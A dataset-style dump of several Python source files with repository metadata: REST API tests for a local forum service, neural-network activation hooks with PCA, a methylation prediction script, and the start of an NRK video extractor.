'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
fields_to_update = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
}
response = requests.put(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers,
json=fields_to_update
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': fields_to_update['username'],
'common_name': fields_to_update['common_name'],
'email': fields_to_update['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_get_user_posts():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
forum_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000))
}
headers = {'Authorization': f'Bearer {token}'}
response = requests.post(
f'http://127.0.0.1:5000/api/v1/forums/create',
headers=headers,
json=forum_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
forum_id = response.json()['forum_id']
thread_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000)),
'text': fake.text(),
'forum_id': forum_id
}
response = requests.post(
'http://127.0.0.1:5000/api/v1/threads/create',
json=thread_info,
headers=headers
)
logger.info(f'Receive response: {response.text}')
thread_id = response.json()['thread_id']
headers = {'Authorization': f'Bearer {token}'}
expected_posts = defaultdict(dict)
for _ in range(3):
post_text = fake.text()
response = requests.post(
'http://127.0.0.1:5000/api/v1/posts/create',
json={'text': post_text, 'thread_id': thread_id},
headers=headers
)
assert response.status_code == 201
expected_posts[response.json()['post_id']] = post_text
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}/posts',
headers=headers
)
logger.info(f'Get user posts response: {response.text}')
assert response.status_code == 200
response_json = response.json()
returned_posts = response_json.get('user_posts')
assert returned_posts is not None
assert len(returned_posts) == len(expected_posts)
for post in returned_posts:
post_id = post.get('id')
assert post_id in expected_posts
expected_text = expected_posts[post_id]
assert post.get('text') == expected_text
assert post.get('user_id') == user_id
assert post.get('creation_timestamp')
| 31.431111
| 75
| 0.610436
|
from collections import defaultdict
import logging
import random
from faker import Faker
import requests
logger = logging.getLogger(__file__)
def test_create_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
response_json = response.json()
assert len(response_json) == 1
user_id = response_json.get('user_id')
assert user_id
assert isinstance(user_id, int)
def test_get_token():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
token = response_json.get('token')
assert token
def test_get_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': user_info['username'],
'common_name': user_info['common_name'],
'email': user_info['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_update_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
fields_to_update = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
}
response = requests.put(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers,
json=fields_to_update
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': fields_to_update['username'],
'common_name': fields_to_update['common_name'],
'email': fields_to_update['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_get_user_posts():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
forum_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000))
}
headers = {'Authorization': f'Bearer {token}'}
response = requests.post(
f'http://127.0.0.1:5000/api/v1/forums/create',
headers=headers,
json=forum_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
forum_id = response.json()['forum_id']
thread_info = {
'name': fake.company() + str(random.randint(1, 1000)),
'short_name': fake.company_suffix() + str(random.randint(1, 1000)),
'text': fake.text(),
'forum_id': forum_id
}
response = requests.post(
'http://127.0.0.1:5000/api/v1/threads/create',
json=thread_info,
headers=headers
)
logger.info(f'Receive response: {response.text}')
thread_id = response.json()['thread_id']
headers = {'Authorization': f'Bearer {token}'}
expected_posts = defaultdict(dict)
for _ in range(3):
post_text = fake.text()
response = requests.post(
'http://127.0.0.1:5000/api/v1/posts/create',
json={'text': post_text, 'thread_id': thread_id},
headers=headers
)
assert response.status_code == 201
expected_posts[response.json()['post_id']] = post_text
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}/posts',
headers=headers
)
logger.info(f'Get user posts response: {response.text}')
assert response.status_code == 200
response_json = response.json()
returned_posts = response_json.get('user_posts')
assert returned_posts is not None
assert len(returned_posts) == len(expected_posts)
for post in returned_posts:
post_id = post.get('id')
assert post_id in expected_posts
expected_text = expected_posts[post_id]
assert post.get('text') == expected_text
assert post.get('user_id') == user_id
assert post.get('creation_timestamp')
| true
| true
|
f70b36ff11e294f9ba8cdf3e7c715b9161f3372a
| 9,632
|
py
|
Python
|
model_tools/activations/hooks.py
|
BonnerLab/model-tools
|
ac90617cd79bb70a308e34a1e834971498329fb0
|
[
"MIT"
] | null | null | null |
model_tools/activations/hooks.py
|
BonnerLab/model-tools
|
ac90617cd79bb70a308e34a1e834971498329fb0
|
[
"MIT"
] | null | null | null |
model_tools/activations/hooks.py
|
BonnerLab/model-tools
|
ac90617cd79bb70a308e34a1e834971498329fb0
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
import logging
import os
from typing import Optional, Union, Iterable, Dict
import h5py
import numpy as np
import torch
from PIL import Image
from tqdm import tqdm
from brainio.stimuli import StimulusSet
from model_tools.activations import ActivationsModel
from model_tools.activations.core import flatten, change_dict
from model_tools.utils import fullname, s3
from model_tools.utils.pca import IncrementalPCAPytorch, PCAPytorch
from result_caching import store_dict
Stimuli = Union[Iterable[str], StimulusSet, Iterable[os.PathLike]]
BasePCA = Union[IncrementalPCAPytorch, PCAPytorch]
class LayerHookBase(ABC):
def __init__(self, activations_extractor: ActivationsModel, identifier: Optional[str] = None):
self._extractor = activations_extractor
self.identifier = identifier
self.handle = None
def __call__(self, batch_activations: Dict[str, np.ndarray]) -> Dict[str, np.ndarray]:
self.setup(batch_activations)
return change_dict(batch_activations, self.layer_apply, keep_name=True,
multithread=os.getenv('MT_MULTITHREAD', '1') == '1')
@classmethod
def hook(cls, activations_extractor: ActivationsModel, identifier: Optional[str] = None, **kwargs):
hook = cls(activations_extractor=activations_extractor, identifier=identifier, **kwargs)
assert not cls.is_hooked(activations_extractor), f"{cls.__name__} is already hooked"
handle = activations_extractor.register_batch_activations_hook(hook)
hook.handle = handle
return handle
@classmethod
def is_hooked(cls, activations_extractor: ActivationsModel) -> bool:
return any(isinstance(hook, cls) for hook in
activations_extractor._extractor._batch_activations_hooks.values())
def setup(self, batch_activations: Dict[str, np.ndarray]) -> None:
pass
@abstractmethod
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
pass
class LayerGlobalMaxPool2d(LayerHookBase):
def __init__(self, *args, identifier: Optional[str] = None, **kwargs):
if identifier is None:
identifier = 'maxpool'
super(LayerGlobalMaxPool2d, self).__init__(*args, **kwargs, identifier=identifier)
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
if activations.ndim != 4:
return activations
return np.max(activations, axis=(2, 3))
class LayerRandomProjection(LayerHookBase):
def __init__(self, *args,
n_components: int = 1000,
force: bool = False,
identifier: Optional[str] = None,
**kwargs):
if identifier is None:
identifier = f'randproj_ncomponents={n_components}_force={force}'
super(LayerRandomProjection, self).__init__(*args, **kwargs, identifier=identifier)
self._n_components = n_components
self._force = force
self._layer_ws = {}
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
activations = flatten(activations)
if activations.shape[1] <= self._n_components and not self._force:
return activations
if layer not in self._layer_ws:
w = np.random.normal(size=(activations.shape[-1], self._n_components)) / np.sqrt(self._n_components)
self._layer_ws[layer] = w
else:
w = self._layer_ws[layer]
activations = activations @ w
return activations
class LayerPCA(LayerHookBase):
def __init__(self, *args,
n_components: int = 1000,
force: bool = False,
stimuli: Optional[Stimuli] = None,
stimuli_identifier: Optional[str] = None,
identifier: Optional[str] = None,
batch_size: Optional[int] = None,
device: Optional[Union[str, torch.device]] = None,
**kwargs):
if stimuli is None:
# Default to ImageNet validation with 1 image per class
stimuli = _get_imagenet_val(n_components)
stimuli_identifier = 'brainscore-imagenetval'
if isinstance(stimuli, StimulusSet) and stimuli_identifier is None and hasattr(stimuli, 'identifier'):
stimuli_identifier = stimuli.identifier
if stimuli_identifier is None:
raise ValueError('If passing a list of paths for stimuli '
'or a StimulusSet without an identifier attribute, '
'you must provide a stimuli_identifier')
if identifier is None:
identifier = f'pca_ncomponents={n_components}_force={force}_stimuli_identifier={stimuli_identifier}'
super(LayerPCA, self).__init__(*args, **kwargs, identifier=identifier)
self._n_components = n_components
self._force = force
self._stimuli_identifier = stimuli_identifier
self._stimuli = stimuli
self._batch_size = batch_size
self._device = device
self._logger = logging.getLogger(fullname(self))
self._layer_pcas = {}
def setup(self, batch_activations) -> None:
layers = batch_activations.keys()
missing_layers = [layer for layer in layers if layer not in self._layer_pcas]
if len(missing_layers) == 0:
return
layer_pcas = self._pcas(identifier=self._extractor.identifier,
layers=missing_layers,
n_components=self._n_components,
force=self._force,
stimuli_identifier=self._stimuli_identifier)
self._layer_pcas = {**self._layer_pcas, **layer_pcas}
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
pca = self._layer_pcas[layer]
activations = flatten(activations)
if pca is None:
return activations
return pca.transform(torch.from_numpy(activations).to(self._device))
@store_dict(dict_key='layers', identifier_ignore=['layers'])
def _pcas(self, identifier, layers, n_components, force, stimuli_identifier) -> Dict[str, BasePCA]:
self._logger.debug(f'Retrieving {stimuli_identifier} activations')
self.handle.disable()
activations = self._extractor(self._stimuli, layers=layers, stimuli_identifier=False)
activations = {layer: activations.sel(layer=layer).values
for layer in np.unique(activations['layer'])}
assert len(set(layer_activations.shape[0] for layer_activations in activations.values())) == 1, "stimuli differ"
self.handle.enable()
self._logger.debug(f'Computing {stimuli_identifier} principal components')
progress = tqdm(total=len(activations), desc="layer principal components", leave=False)
def init_and_progress(layer, activations):
activations = flatten(activations)
if activations.shape[1] <= n_components and not force:
self._logger.debug(f"Not computing principal components for {layer} "
f"activations {activations.shape} as shape is small enough already")
progress.update(1)
return None
n_components_ = n_components if activations.shape[1] > n_components else activations.shape[1]
if self._batch_size is None:
pca = PCAPytorch(n_components_, device=self._device)
pca.fit(torch.from_numpy(activations).to(self._device))
else:
pca = IncrementalPCAPytorch(n_components_, device=self._device)
for i in range(0, activations.shape[0], self._batch_size):
activations_batch = torch.from_numpy(activations[i:i + self._batch_size]).to(self._device)
pca.fit_partial(activations_batch)
return pca
layer_pcas = change_dict(activations, init_and_progress, keep_name=True,
multithread=os.getenv('MT_MULTITHREAD', '1') == '1')
progress.close()
return layer_pcas
def _get_imagenet_val(num_images):
_logger = logging.getLogger(fullname(_get_imagenet_val))
num_classes = 1000
num_images_per_class = (num_images - 1) // num_classes
base_indices = np.arange(num_images_per_class).astype(int)
indices = []
for i in range(num_classes):
indices.extend(50 * i + base_indices)
for i in range((num_images - 1) % num_classes + 1):
indices.extend(50 * i + np.array([num_images_per_class]).astype(int))
framework_home = os.path.expanduser(os.getenv('MT_HOME', '~/.model-tools'))
imagenet_filepath = os.getenv('MT_IMAGENET_PATH', os.path.join(framework_home, 'imagenet2012.hdf5'))
imagenet_dir = f"{imagenet_filepath}-files"
os.makedirs(imagenet_dir, exist_ok=True)
if not os.path.isfile(imagenet_filepath):
os.makedirs(os.path.dirname(imagenet_filepath), exist_ok=True)
_logger.debug(f"Downloading ImageNet validation to {imagenet_filepath}")
s3.download_file("imagenet2012-val.hdf5", imagenet_filepath)
filepaths = []
with h5py.File(imagenet_filepath, 'r') as f:
for index in indices:
imagepath = os.path.join(imagenet_dir, f"{index}.png")
if not os.path.isfile(imagepath):
image = np.array(f['val/images'][index])
Image.fromarray(image).save(imagepath)
filepaths.append(imagepath)
return filepaths
| 43.781818
| 120
| 0.653758
|
from abc import ABC, abstractmethod
import logging
import os
from typing import Optional, Union, Iterable, Dict
import h5py
import numpy as np
import torch
from PIL import Image
from tqdm import tqdm
from brainio.stimuli import StimulusSet
from model_tools.activations import ActivationsModel
from model_tools.activations.core import flatten, change_dict
from model_tools.utils import fullname, s3
from model_tools.utils.pca import IncrementalPCAPytorch, PCAPytorch
from result_caching import store_dict
Stimuli = Union[Iterable[str], StimulusSet, Iterable[os.PathLike]]
BasePCA = Union[IncrementalPCAPytorch, PCAPytorch]
class LayerHookBase(ABC):
def __init__(self, activations_extractor: ActivationsModel, identifier: Optional[str] = None):
self._extractor = activations_extractor
self.identifier = identifier
self.handle = None
def __call__(self, batch_activations: Dict[str, np.ndarray]) -> Dict[str, np.ndarray]:
self.setup(batch_activations)
return change_dict(batch_activations, self.layer_apply, keep_name=True,
multithread=os.getenv('MT_MULTITHREAD', '1') == '1')
@classmethod
def hook(cls, activations_extractor: ActivationsModel, identifier: Optional[str] = None, **kwargs):
hook = cls(activations_extractor=activations_extractor, identifier=identifier, **kwargs)
assert not cls.is_hooked(activations_extractor), f"{cls.__name__} is already hooked"
handle = activations_extractor.register_batch_activations_hook(hook)
hook.handle = handle
return handle
@classmethod
def is_hooked(cls, activations_extractor: ActivationsModel) -> bool:
return any(isinstance(hook, cls) for hook in
activations_extractor._extractor._batch_activations_hooks.values())
def setup(self, batch_activations: Dict[str, np.ndarray]) -> None:
pass
@abstractmethod
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
pass
class LayerGlobalMaxPool2d(LayerHookBase):
def __init__(self, *args, identifier: Optional[str] = None, **kwargs):
if identifier is None:
identifier = 'maxpool'
super(LayerGlobalMaxPool2d, self).__init__(*args, **kwargs, identifier=identifier)
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
if activations.ndim != 4:
return activations
return np.max(activations, axis=(2, 3))
class LayerRandomProjection(LayerHookBase):
def __init__(self, *args,
n_components: int = 1000,
force: bool = False,
identifier: Optional[str] = None,
**kwargs):
if identifier is None:
identifier = f'randproj_ncomponents={n_components}_force={force}'
super(LayerRandomProjection, self).__init__(*args, **kwargs, identifier=identifier)
self._n_components = n_components
self._force = force
self._layer_ws = {}
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
activations = flatten(activations)
if activations.shape[1] <= self._n_components and not self._force:
return activations
if layer not in self._layer_ws:
w = np.random.normal(size=(activations.shape[-1], self._n_components)) / np.sqrt(self._n_components)
self._layer_ws[layer] = w
else:
w = self._layer_ws[layer]
activations = activations @ w
return activations
class LayerPCA(LayerHookBase):
def __init__(self, *args,
n_components: int = 1000,
force: bool = False,
stimuli: Optional[Stimuli] = None,
stimuli_identifier: Optional[str] = None,
identifier: Optional[str] = None,
batch_size: Optional[int] = None,
device: Optional[Union[str, torch.device]] = None,
**kwargs):
if stimuli is None:
stimuli = _get_imagenet_val(n_components)
stimuli_identifier = 'brainscore-imagenetval'
if isinstance(stimuli, StimulusSet) and stimuli_identifier is None and hasattr(stimuli, 'identifier'):
stimuli_identifier = stimuli.identifier
if stimuli_identifier is None:
raise ValueError('If passing a list of paths for stimuli '
'or a StimulusSet without an identifier attribute, '
'you must provide a stimuli_identifier')
if identifier is None:
identifier = f'pca_ncomponents={n_components}_force={force}_stimuli_identifier={stimuli_identifier}'
super(LayerPCA, self).__init__(*args, **kwargs, identifier=identifier)
self._n_components = n_components
self._force = force
self._stimuli_identifier = stimuli_identifier
self._stimuli = stimuli
self._batch_size = batch_size
self._device = device
self._logger = logging.getLogger(fullname(self))
self._layer_pcas = {}
def setup(self, batch_activations) -> None:
layers = batch_activations.keys()
missing_layers = [layer for layer in layers if layer not in self._layer_pcas]
if len(missing_layers) == 0:
return
layer_pcas = self._pcas(identifier=self._extractor.identifier,
layers=missing_layers,
n_components=self._n_components,
force=self._force,
stimuli_identifier=self._stimuli_identifier)
self._layer_pcas = {**self._layer_pcas, **layer_pcas}
def layer_apply(self, layer: str, activations: np.ndarray) -> np.ndarray:
pca = self._layer_pcas[layer]
activations = flatten(activations)
if pca is None:
return activations
return pca.transform(torch.from_numpy(activations).to(self._device))
@store_dict(dict_key='layers', identifier_ignore=['layers'])
def _pcas(self, identifier, layers, n_components, force, stimuli_identifier) -> Dict[str, BasePCA]:
self._logger.debug(f'Retrieving {stimuli_identifier} activations')
self.handle.disable()
activations = self._extractor(self._stimuli, layers=layers, stimuli_identifier=False)
activations = {layer: activations.sel(layer=layer).values
for layer in np.unique(activations['layer'])}
assert len(set(layer_activations.shape[0] for layer_activations in activations.values())) == 1, "stimuli differ"
self.handle.enable()
self._logger.debug(f'Computing {stimuli_identifier} principal components')
progress = tqdm(total=len(activations), desc="layer principal components", leave=False)
def init_and_progress(layer, activations):
activations = flatten(activations)
if activations.shape[1] <= n_components and not force:
self._logger.debug(f"Not computing principal components for {layer} "
f"activations {activations.shape} as shape is small enough already")
progress.update(1)
return None
n_components_ = n_components if activations.shape[1] > n_components else activations.shape[1]
if self._batch_size is None:
pca = PCAPytorch(n_components_, device=self._device)
pca.fit(torch.from_numpy(activations).to(self._device))
else:
pca = IncrementalPCAPytorch(n_components_, device=self._device)
for i in range(0, activations.shape[0], self._batch_size):
activations_batch = torch.from_numpy(activations[i:i + self._batch_size]).to(self._device)
pca.fit_partial(activations_batch)
return pca
layer_pcas = change_dict(activations, init_and_progress, keep_name=True,
multithread=os.getenv('MT_MULTITHREAD', '1') == '1')
progress.close()
return layer_pcas
def _get_imagenet_val(num_images):
_logger = logging.getLogger(fullname(_get_imagenet_val))
num_classes = 1000
num_images_per_class = (num_images - 1) // num_classes
base_indices = np.arange(num_images_per_class).astype(int)
indices = []
for i in range(num_classes):
indices.extend(50 * i + base_indices)
for i in range((num_images - 1) % num_classes + 1):
indices.extend(50 * i + np.array([num_images_per_class]).astype(int))
framework_home = os.path.expanduser(os.getenv('MT_HOME', '~/.model-tools'))
imagenet_filepath = os.getenv('MT_IMAGENET_PATH', os.path.join(framework_home, 'imagenet2012.hdf5'))
imagenet_dir = f"{imagenet_filepath}-files"
os.makedirs(imagenet_dir, exist_ok=True)
if not os.path.isfile(imagenet_filepath):
os.makedirs(os.path.dirname(imagenet_filepath), exist_ok=True)
_logger.debug(f"Downloading ImageNet validation to {imagenet_filepath}")
s3.download_file("imagenet2012-val.hdf5", imagenet_filepath)
filepaths = []
with h5py.File(imagenet_filepath, 'r') as f:
for index in indices:
imagepath = os.path.join(imagenet_dir, f"{index}.png")
if not os.path.isfile(imagepath):
image = np.array(f['val/images'][index])
Image.fromarray(image).save(imagepath)
filepaths.append(imagepath)
return filepaths
| true
| true
|
f70b387bc0378d9c79b7989c448252e010565e1a
| 3,287
|
py
|
Python
|
combination_model_prediction.py
|
hrrsjeong/METEORE
|
86f7949a0d65ccdabbbb41c44ea0a37fe4eb33c4
|
[
"MIT"
] | 1
|
2020-07-16T09:59:58.000Z
|
2020-07-16T09:59:58.000Z
|
combination_model_prediction.py
|
comprna/supermix
|
ba8e517c51dbfd3fea5130f297c480c4626c2ff0
|
[
"MIT"
] | null | null | null |
combination_model_prediction.py
|
comprna/supermix
|
ba8e517c51dbfd3fea5130f297c480c4626c2ff0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 9 18:03:39 2020
@author: akanksha
"""
import pandas as pd
import numpy as np
import joblib
from itertools import combinations
import sklearn
from functools import reduce
import argparse
import os
parser = argparse.ArgumentParser(description = 'Prediction from combined models for the reads.')
parser.add_argument('--methodsfile','-i', type = str, required = True,
help = 'TSV file containing name and path of the method output tsv file. The output tsv file from the method should be in the format [ID,Pos,Strand,Score]. Can be compressed in gz.')
parser.add_argument('--model','-m', choices = ["default","optimized"], required = True, type = str,
help = 'which model to select from default RF or optimized RF with max_depth 3 and n_estimator 10')
parser.add_argument('--output', '-o',type = str, required = True,
help = 'Where to store the outputs')
options = parser.parse_args()
def mod_file(data_file_path):
data_file=pd.read_csv(data_file_path, header=0, sep="\t")
name=data_file_path.split("\\")[-1].split(".")[0]
data_file.drop_duplicates(subset=['Chr',"ID","Pos","Strand"],inplace=True) # add chr
data_file.reset_index(inplace=True,drop=True)
mask=data_file.index[data_file.Strand=="-"].tolist()
data_file["Pos"][mask]=data_file["Pos"][mask]-1
data_file.drop(["Strand"], axis=1, inplace=True)
data_file.rename(columns={"Score":name}, inplace=True)
data_file.reset_index(inplace=True, drop=True)
return(data_file)
def main(mp,combine_file):
loaded_model = joblib.load(open(mp, 'rb'))
X=combine_file[combine_file.columns[3:]] #2:
X=sklearn.preprocessing.MinMaxScaler().fit_transform(X)
prediction=pd.DataFrame(loaded_model.predict(X)) ##
prediction_prob=pd.DataFrame(loaded_model.predict_proba(X))
prediction.rename(columns={0:"Prediction"}, inplace=True)
prediction_prob=prediction_prob[[1]]
prediction_prob.rename(columns={1:"Prob_methylation"}, inplace=True)
final_output=pd.concat([combine_file[combine_file.columns[:3]],prediction,prediction_prob], axis=1) #:2
#os.makedirs(options.output)
#final_output.to_csv(options.output+'/predictions_combination_method.tsv', header=True, index=None, sep='\t')
dir = ("combined_model_results")
if not os.path.isdir(dir):
os.makedirs(dir)
final_output.to_csv(dir+'/'+options.output, header=True, index=None, sep='\t')
else:
final_output.to_csv(dir+'/'+options.output, header=True, index=None, sep='\t')
if __name__ == '__main__':
df_file=pd.read_csv(options.methodsfile, header=None, sep='\t')
if options.model=="default":
fillval="default"
else:
fillval="max_depth_3_n_estimator_10"
modelname='_'.join(df_file[0])
mp='saved_models/rf_model_'+fillval+'_'+modelname+'.model'
dfs=[]
for i in df_file[1]:
dfs.append(mod_file(i))
combine_file=reduce(lambda left,right: pd.merge(left, right, how='inner',on=["ID","Chr","Pos"]), dfs) # add chr
combine_file.drop_duplicates(subset=["ID","Chr","Pos"],inplace=True) # add chr
combine_file.reset_index(inplace=True, drop=True)
main(mp,combine_file) ##
| 42.141026
| 187
| 0.684211
|
import pandas as pd
import numpy as np
import joblib
from itertools import combinations
import sklearn
from functools import reduce
import argparse
import os
parser = argparse.ArgumentParser(description = 'Prediction from combined models for the reads.')
parser.add_argument('--methodsfile','-i', type = str, required = True,
help = 'TSV file containing name and path of the method output tsv file. The output tsv file from the method should be in the format [ID,Pos,Strand,Score]. Can be compressed in gz.')
parser.add_argument('--model','-m', choices = ["default","optimized"], required = True, type = str,
help = 'which model to select from default RF or optimized RF with max_depth 3 and n_estimator 10')
parser.add_argument('--output', '-o',type = str, required = True,
help = 'Where to store the outputs')
options = parser.parse_args()
def mod_file(data_file_path):
data_file=pd.read_csv(data_file_path, header=0, sep="\t")
name=data_file_path.split("\\")[-1].split(".")[0]
data_file.drop_duplicates(subset=['Chr',"ID","Pos","Strand"],inplace=True)
data_file.reset_index(inplace=True,drop=True)
mask=data_file.index[data_file.Strand=="-"].tolist()
data_file["Pos"][mask]=data_file["Pos"][mask]-1
data_file.drop(["Strand"], axis=1, inplace=True)
data_file.rename(columns={"Score":name}, inplace=True)
data_file.reset_index(inplace=True, drop=True)
return(data_file)
def main(mp,combine_file):
loaded_model = joblib.load(open(mp, 'rb'))
X=combine_file[combine_file.columns[3:]]
X=sklearn.preprocessing.MinMaxScaler().fit_transform(X)
prediction=pd.DataFrame(loaded_model.predict(X)) prediction_prob=pd.DataFrame(loaded_model.predict_proba(X))
prediction.rename(columns={0:"Prediction"}, inplace=True)
prediction_prob=prediction_prob[[1]]
prediction_prob.rename(columns={1:"Prob_methylation"}, inplace=True)
final_output=pd.concat([combine_file[combine_file.columns[:3]],prediction,prediction_prob], axis=1)
dir = ("combined_model_results")
if not os.path.isdir(dir):
os.makedirs(dir)
final_output.to_csv(dir+'/'+options.output, header=True, index=None, sep='\t')
else:
final_output.to_csv(dir+'/'+options.output, header=True, index=None, sep='\t')
if __name__ == '__main__':
df_file=pd.read_csv(options.methodsfile, header=None, sep='\t')
if options.model=="default":
fillval="default"
else:
fillval="max_depth_3_n_estimator_10"
modelname='_'.join(df_file[0])
mp='saved_models/rf_model_'+fillval+'_'+modelname+'.model'
dfs=[]
for i in df_file[1]:
dfs.append(mod_file(i))
combine_file=reduce(lambda left,right: pd.merge(left, right, how='inner',on=["ID","Chr","Pos"]), dfs)
combine_file.drop_duplicates(subset=["ID","Chr","Pos"],inplace=True)
combine_file.reset_index(inplace=True, drop=True)
main(mp,combine_file)
| true
| true
|
f70b38a03ce07d299e033c0ceaa1d15797c754cb
| 35,573
|
py
|
Python
|
nextdl/extractor/nrk.py
|
devenu85/nextdl
|
0b458f556e2e0be80cb94bd9a9b1405ad2e9182d
|
[
"MIT"
] | 1
|
2021-12-19T13:55:20.000Z
|
2021-12-19T13:55:20.000Z
|
nextdl/extractor/nrk.py
|
devenu85/nextdl
|
0b458f556e2e0be80cb94bd9a9b1405ad2e9182d
|
[
"MIT"
] | null | null | null |
nextdl/extractor/nrk.py
|
devenu85/nextdl
|
0b458f556e2e0be80cb94bd9a9b1405ad2e9182d
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
import itertools
import random
import re
from ..compat import compat_str
from ..utils import (ExtractorError, determine_ext, int_or_none,
parse_duration, str_or_none, try_get, url_or_none,
urljoin)
from .common import InfoExtractor
class NRKBaseIE(InfoExtractor):
_GEO_COUNTRIES = ["NO"]
_CDN_REPL_REGEX = r"""(?x)://
(?:
nrkod\d{1,2}-httpcache0-47115-cacheod0\.dna\.ip-only\.net/47115-cacheod0|
nrk-od-no\.telenorcdn\.net|
minicdn-od\.nrk\.no/od/nrkhd-osl-rr\.netwerk\.no/no
)/"""
def _extract_nrk_formats(self, asset_url, video_id):
if re.match(r"https?://[^/]+\.akamaihd\.net/i/", asset_url):
return self._extract_akamai_formats(asset_url, video_id)
asset_url = re.sub(r"(?:bw_(?:low|high)=\d+|no_audio_only)&?", "", asset_url)
formats = self._extract_m3u8_formats(
asset_url, video_id, "mp4", "m3u8_native", fatal=False
)
if not formats and re.search(self._CDN_REPL_REGEX, asset_url):
formats = self._extract_m3u8_formats(
re.sub(
self._CDN_REPL_REGEX,
"://nrk-od-%02d.akamaized.net/no/" % random.randint(0, 99),
asset_url,
),
video_id,
"mp4",
"m3u8_native",
fatal=False,
)
return formats
def _raise_error(self, data):
MESSAGES = {
"ProgramRightsAreNotReady": "Du kan dessverre ikke se eller høre programmet",
"ProgramRightsHasExpired": "Programmet har gått ut",
"NoProgramRights": "Ikke tilgjengelig",
"ProgramIsGeoBlocked": "NRK har ikke rettigheter til å vise dette programmet utenfor Norge",
}
message_type = data.get("messageType", "")
# Can be ProgramIsGeoBlocked or ChannelIsGeoBlocked*
if (
"IsGeoBlocked" in message_type
or try_get(data, lambda x: x["usageRights"]["isGeoBlocked"]) is True
):
self.raise_geo_restricted(
